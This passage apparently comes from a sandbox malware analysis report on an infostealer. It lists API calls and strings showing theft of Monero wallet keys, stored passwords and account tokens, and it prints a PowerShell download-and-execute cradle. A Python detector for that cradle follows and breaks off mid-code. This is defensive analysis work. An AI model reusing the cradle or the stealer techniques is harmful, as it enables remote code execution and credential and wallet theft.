                        • Opcode Fuzzy Hash: 98f736806e4e6253e22fd68756b9da6f4171b28df0c997bf2db9d4b4327dd6b5
                        • Instruction Fuzzy Hash: 2A51DA709101489ACB18EF68CD96AEE7779FF50341F508028E42EDA596DF34AB46CB53
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: e945fb20f26fc3274379ca6e8e6fe0bd649a3c12202bf7b14a7111b8081681fb
                        • Instruction ID: 11d3fa06d20e1bc9819b1d6dbbced605b5ba942122f42db95dea44232e6fad97
                        • Opcode Fuzzy Hash: e945fb20f26fc3274379ca6e8e6fe0bd649a3c12202bf7b14a7111b8081681fb
                        • Instruction Fuzzy Hash: B3C184B59001199BCB18EFA4DC89FEE7778FB64304F008598E51EA7185DB70EA85CF92
                        APIs
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 008742EC
                        • lstrcat.KERNEL32(?,0116E828), ref: 0087430B
                        • lstrcat.KERNEL32(?,?), ref: 0087431F
                        • lstrcat.KERNEL32(?,0116D980), ref: 00874333
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 00878D90: GetFileAttributesA.KERNEL32(00000000,?,00861B54,?,?,0088564C,?,?,00880E1F), ref: 00878D9F
                          • Part of subcall function 00869CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00869D39
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                          • Part of subcall function 008793C0: GlobalAlloc.KERNEL32(00000000,008743DD,008743DD), ref: 008793D3
                        • StrStrA.SHLWAPI(?,0116E660), ref: 008743F3
                        • GlobalFree.KERNEL32(?), ref: 00874512
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869AEF
                          • Part of subcall function 00869AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00864EEE,00000000,?), ref: 00869B01
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869B2A
                          • Part of subcall function 00869AC0: LocalFree.KERNEL32(?,?,?,?,00864EEE,00000000,?), ref: 00869B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 008744A3
                        • StrCmpCA.SHLWAPI(?,008808D1), ref: 008744C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 008744D2
                        • lstrcat.KERNEL32(00000000,?), ref: 008744E5
                        • lstrcat.KERNEL32(00000000,00880FB8), ref: 008744F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: df8a5767654cbef8525e78299a3b6f17b12192387cd6eb3eda58ab5e5d06d03c
                        • Instruction ID: 640dcf3b6a0392d55427d04cbbb6e2f0e8f630e58ea4e38b7bda93dd0e63fa39
                        • Opcode Fuzzy Hash: df8a5767654cbef8525e78299a3b6f17b12192387cd6eb3eda58ab5e5d06d03c
                        • Instruction Fuzzy Hash: 66714476900208ABCB54EBE4DC89FEE77B9FB98300F048598E609D7185DB34DB45CB92
                        APIs
                          • Part of subcall function 008612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008612B4
                          • Part of subcall function 008612A0: RtlAllocateHeap.NTDLL(00000000), ref: 008612BB
                          • Part of subcall function 008612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008612D7
                          • Part of subcall function 008612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008612F5
                          • Part of subcall function 008612A0: RegCloseKey.ADVAPI32(?), ref: 008612FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0086134F
                        • lstrlen.KERNEL32(?), ref: 0086135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00861377
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00861465
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 008614EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: fc82f9c6a8819f4c2979ac9e0e5bc7e8ddff462014aba8073afb385931efac8a
                        • Instruction ID: 1018a76d8d9580ef1265ea9d8313caf31a8b8ba991befda3c1b57a7eaae96562
                        • Opcode Fuzzy Hash: fc82f9c6a8819f4c2979ac9e0e5bc7e8ddff462014aba8073afb385931efac8a
                        • Instruction Fuzzy Hash: B55132B191011957CB59EB64DC95BEE737CFB54300F4041A8B61AE2086EF309B85CBA7
                        APIs
                          • Part of subcall function 008672D0: memset.MSVCRT ref: 00867314
                          • Part of subcall function 008672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0086733A
                          • Part of subcall function 008672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008673B1
                          • Part of subcall function 008672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0086740D
                          • Part of subcall function 008672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00867452
                          • Part of subcall function 008672D0: HeapFree.KERNEL32(00000000), ref: 00867459
                        • lstrcat.KERNEL32(00000000,008817FC), ref: 00867606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00867648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0086765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0086768F
                        • lstrcat.KERNEL32(00000000,00881804), ref: 008676A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 008676D3
                        • lstrcat.KERNEL32(00000000,00881808), ref: 008676ED
                        • task.LIBCPMTD ref: 008676FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 0d178cf2d6f0a5019a9f2a69cf2a3b8d89507d4cc464ade3e0b7ee2bbeee6389
                        • Instruction ID: 75cbb499d716a4d3b2951b7cf6444344bc681e8e3301b480ed5e8940405a53a0
                        • Opcode Fuzzy Hash: 0d178cf2d6f0a5019a9f2a69cf2a3b8d89507d4cc464ade3e0b7ee2bbeee6389
                        • Instruction Fuzzy Hash: FE314D7190010ADBCB48EBE8DC99DFE73B9FB69305B144118E106E7291DB38A947CB92
                        APIs
                        • memset.MSVCRT ref: 00867314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0086733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008673B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0086740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00867452
                        • HeapFree.KERNEL32(00000000), ref: 00867459
                        • task.LIBCPMTD ref: 00867555
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: e54acc2514a262698f71b919abc150f1850bf29c7e6875541e9c96d4db9d8317
                        • Instruction ID: 5bcd60b1637d85706441de930fc894363b3496ee83d1990a43ee946ebfe68819
                        • Opcode Fuzzy Hash: e54acc2514a262698f71b919abc150f1850bf29c7e6875541e9c96d4db9d8317
                        • Instruction Fuzzy Hash: 93614CB180412C9BDB24DB54CC55BDAB7B8FF58304F0081E9E689A6281EF705BC9CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0116E438,00000000,?,00880E2C,00000000,?,00000000), ref: 00878130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00878137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00878158
                        • __aulldiv.LIBCMT ref: 00878172
                        • __aulldiv.LIBCMT ref: 00878180
                        • wsprintfA.USER32 ref: 008781AC
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 59a0aff504a9b73450a88e27f029f78a283c1ec54edec811f3b6da4b319ea8fc
                        • Instruction ID: 17bb6f783170639f50fa9e3e81ffdead94f0a0093671af3f3a8166058ac8c15b
                        • Opcode Fuzzy Hash: 59a0aff504a9b73450a88e27f029f78a283c1ec54edec811f3b6da4b319ea8fc
                        • Instruction Fuzzy Hash: 93210BB1E44319ABDB00DFD4CC49FAEB7B8FB44B14F108519F619BB284D778A9018BA5
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                        • InternetOpenA.WININET(00880DF7,00000001,00000000,00000000,00000000), ref: 0086610F
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0086618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008661B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 008661DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0086620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00866249
                        • InternetCloseHandle.WININET(?), ref: 00866253
                        • InternetCloseHandle.WININET(00000000), ref: 00866260
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 7f86f754e6695e3e3502572d9635bbec44ffd8e0d1965a293a861ed07d3d3ef9
                        • Instruction ID: 471b513275363f7fa8598b4554bab3cb73ff2d1b9778dfc91c1e79d85c75d6d4
                        • Opcode Fuzzy Hash: 7f86f754e6695e3e3502572d9635bbec44ffd8e0d1965a293a861ed07d3d3ef9
                        • Instruction Fuzzy Hash: E45194B1900219ABDB24DF90DC55BEE77B8FB44705F108098B605E72C0EB75AA89CF96
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        • lstrlen.KERNEL32(00000000), ref: 0086BC9F
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0086BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0086BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0086BDB9
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: d76a1ef074b3206d67163e804f61a1371a287304bfb4d00cf1f723d19ed75d1e
                        • Instruction ID: 40549fc10d5a9b829a425be481d2988452bc5b99e8ce1f01c584f300216f03ba
                        • Opcode Fuzzy Hash: d76a1ef074b3206d67163e804f61a1371a287304bfb4d00cf1f723d19ed75d1e
                        • Instruction Fuzzy Hash: DCB120719101089BDB08FBA4CD96EEE7778FF94304F408168F51AE6195EF34AA49CB63
                        APIs
                        Strings
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 8fcbfbe78d110a26ce1f4a233f94558d79fcbe8e10b0c73093e822d4dee9ef34
                        • Instruction ID: 427ce075443cf5f577bd8da5ac43e4d5e403cdfff35231f8c0a8167c6083e6f7
                        • Opcode Fuzzy Hash: 8fcbfbe78d110a26ce1f4a233f94558d79fcbe8e10b0c73093e822d4dee9ef34
                        • Instruction Fuzzy Hash: CEF0173190820AEBD384DFE0E90976D7AB0FB16742F040298E609862D0EB748E52DB96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00864FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00864FD1
                        • InternetOpenA.WININET(00880DDF,00000000,00000000,00000000,00000000), ref: 00864FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00865011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00865041
                        • InternetCloseHandle.WININET(?), ref: 008650B9
                        • InternetCloseHandle.WININET(?), ref: 008650C6
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 3b4ad94cb333da50c48a3b82d5cb372a7bd6d4b4b28ed8ba0ceec8d17afa7cdc
                        • Instruction ID: 38938619c2dde0c1444c1ae1fe5063a235f151b70273109b65e2fc3a15e0c16c
                        • Opcode Fuzzy Hash: 3b4ad94cb333da50c48a3b82d5cb372a7bd6d4b4b28ed8ba0ceec8d17afa7cdc
                        • Instruction Fuzzy Hash: 8D31F7B4A0021CABDB20CF94DC85BDDB7B4FB48704F1081D9EA09A7281D7746AC6CF99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00878426
                        • wsprintfA.USER32 ref: 00878459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0087847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0087848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00878499
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0116E5A0,00000000,000F003F,?,00000400), ref: 008784EC
                        • lstrlen.KERNEL32(?), ref: 00878501
                        • RegQueryValueExA.ADVAPI32(00000000,0116E510,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00880B34), ref: 00878599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00878608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0087861A
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 87a3ed7fd3db3d67c4728ef89d74fca5cee598c5fd8816174fdf7663fe7d63f3
                        • Instruction ID: 377dad41c1a58377371d14e5a6856f20fe65e2025f701ed0a5de89e05e004254
                        • Opcode Fuzzy Hash: 87a3ed7fd3db3d67c4728ef89d74fca5cee598c5fd8816174fdf7663fe7d63f3
                        • Instruction Fuzzy Hash: C421197194021CABDB64DB54DC85FE9B3B8FB58700F00C5D8E609A6180DF75AA86CFD5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008776A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008776AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0115C488,00000000,00020119,00000000), ref: 008776DD
                        • RegQueryValueExA.ADVAPI32(00000000,0116E4F8,00000000,00000000,?,000000FF), ref: 008776FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00877708
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: d927d89fb1f848d46695c64e32e0e0e8e55e597ecde787460af8a5763f005c66
                        • Instruction ID: 3a00df890b59a7858298bf83b8a643851a3518af0e6a956075032ff95e96de85
                        • Opcode Fuzzy Hash: d927d89fb1f848d46695c64e32e0e0e8e55e597ecde787460af8a5763f005c66
                        • Instruction Fuzzy Hash: F4014FB5A04209BBDB00DBE4DC49F6AB7F8EB59701F108454FA05D72D4D7749905CB51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0087773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0115C488,00000000,00020119,008776B9), ref: 0087775B
                        • RegQueryValueExA.ADVAPI32(008776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0087777A
                        • RegCloseKey.ADVAPI32(008776B9), ref: 00877784
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: f51d26e14ab6d5622e9c3b9ed06fe6b33b9a379b528313092a39cbe096344f0b
                        • Instruction ID: 240c2edafb444167de0c046604a330662f68a76aa6ce203b33d2c3d8973669b5
                        • Opcode Fuzzy Hash: f51d26e14ab6d5622e9c3b9ed06fe6b33b9a379b528313092a39cbe096344f0b
                        • Instruction Fuzzy Hash: 8D0121B5A40209BBDB00DBE4DC49FAEB7B8EB58701F008158FA05E62C1D7759501CB51
                        APIs
                        • memset.MSVCRT ref: 008740D5
                        • RegOpenKeyExA.ADVAPI32(80000001,0116E218,00000000,00020119,?), ref: 008740F4
                        • RegQueryValueExA.ADVAPI32(?,0116E8D0,00000000,00000000,00000000,000000FF), ref: 00874118
                        • RegCloseKey.ADVAPI32(?), ref: 00874122
                        • lstrcat.KERNEL32(?,00000000), ref: 00874147
                        • lstrcat.KERNEL32(?,0116E678), ref: 0087415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: f75148f5d1b1a8782b2ff64caa948020d7b977e9f090a92b258ac165446beeb9
                        • Instruction ID: 9dbdeb7eab3c445110f3b1fec7bff167be32fbc36beef338d2c35ee914d4a2dd
                        • Opcode Fuzzy Hash: f75148f5d1b1a8782b2ff64caa948020d7b977e9f090a92b258ac165446beeb9
                        • Instruction Fuzzy Hash: 414198B69001086BDB14EBE4DC4AFFE737DF798300F008559B61A96181EB759B89CB93
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                        • LocalFree.KERNEL32(0086148F), ref: 00869A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 160dca0633861f4f777d24018b01d7eca8d07f3d80fe849231a2923827b3d188
                        • Instruction ID: 43335837e85ec93a140194d2c2ad14af2e466c6c0c1983944127e87eb0be55c8
                        • Opcode Fuzzy Hash: 160dca0633861f4f777d24018b01d7eca8d07f3d80fe849231a2923827b3d188
                        • Instruction Fuzzy Hash: EF3105B4A00219EFDB14CF94C885BAE77F9FF49351F108158E912AB2D0D778AA41CFA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: 613a3b139070fe887e89eee1b4f9a1171b735d3505a30b6dd9002210262d6527
                        • Instruction ID: 8a2b94633ac37588947fc81b2d3c1eb2bcb6300a49089fbe0d97d1b6a439c913
                        • Opcode Fuzzy Hash: 613a3b139070fe887e89eee1b4f9a1171b735d3505a30b6dd9002210262d6527
                        • Instruction Fuzzy Hash: E041E77110075C5EDB218B288C84BFB7BE9EF45708F1484ACDA8EC7186D271DA459F61
                        APIs
                        • lstrcat.KERNEL32(?,0116E828), ref: 008747DB
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00874801
                        • lstrcat.KERNEL32(?,?), ref: 00874820
                        • lstrcat.KERNEL32(?,?), ref: 00874834
                        • lstrcat.KERNEL32(?,0115BDB8), ref: 00874847
                        • lstrcat.KERNEL32(?,?), ref: 0087485B
                        • lstrcat.KERNEL32(?,0116DF98), ref: 0087486F
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 00878D90: GetFileAttributesA.KERNEL32(00000000,?,00861B54,?,?,0088564C,?,?,00880E1F), ref: 00878D9F
                          • Part of subcall function 00874570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00874580
                          • Part of subcall function 00874570: RtlAllocateHeap.NTDLL(00000000), ref: 00874587
                          • Part of subcall function 00874570: wsprintfA.USER32 ref: 008745A6
                          • Part of subcall function 00874570: FindFirstFileA.KERNEL32(?,?), ref: 008745BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 4a4456abe5c933db20634e9285307c8031a70dc31dae25ce808ef19a9d8a944b
                        • Instruction ID: e20c9452c54d94db738f2db1d087a350d951c81e61154ad68f7f904c1e675dbc
                        • Opcode Fuzzy Hash: 4a4456abe5c933db20634e9285307c8031a70dc31dae25ce808ef19a9d8a944b
                        • Instruction Fuzzy Hash: 8A3182B294020897CB54FBB4DC89EED77B8FB68700F408589B319D6085EF74D689CB92
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00872D85
                        Strings
                        • ')", xrefs: 00872CB3
                        • <, xrefs: 00872D39
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00872D04
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00872CC4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: be2078cb15bc173f41b2227bac5e91e26ee988bb73fdb5ab6c0bdde5e5b75e4d
                        • Instruction ID: 2d92b0eb75318c4e2cdabb5259f3c51fd441de8fc4beb7f26925f23b722a9dce
                        • Opcode Fuzzy Hash: be2078cb15bc173f41b2227bac5e91e26ee988bb73fdb5ab6c0bdde5e5b75e4d
                        • Instruction Fuzzy Hash: F641AF71C101089ADB58FBA4C895FDEBB74FF54700F408129E12AE6199DF74AA4ACF93
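The function above concatenates a fixed SysWOW64 powershell.exe path with the parameters -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')" and hands the pair to ShellExecuteEx. The following is an added detection example for this report, not code from the sample, from Stealc, or from Joe Sandbox. It scores process-creation events for the tokens that make up that cradle, so a variant that rewrites one token (IEX, -NoP, DownloadData) still alerts, and pulls out the DownloadString argument for blocking. The log lines are constructed to resemble Sysmon Event ID 1 flattened to Key=Value pairs; the field names, the parent paths and the URL are assumptions, not values from the report.

```python
"""
Scorer for the PowerShell download cradle built by the function above.

Added example for this report; not the sample's, Stealc's or Joe Sandbox's code.
The events are constructed (assumed field names, paths and URL).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Each indicator is scored on its own, so rewriting one token does not evade it.
CMD_INDICATORS = [
    ("no_profile", re.compile(r"(^|\s)-no(p|profile)\b", re.I),          2),
    ("iex",        re.compile(r"\b(iex|invoke-expression)\b", re.I),     3),
    ("webclient",  re.compile(r"net\.webclient", re.I),                  3),
    ("download",   re.compile(r"download(string|data|file)\s*\(", re.I), 3),
]
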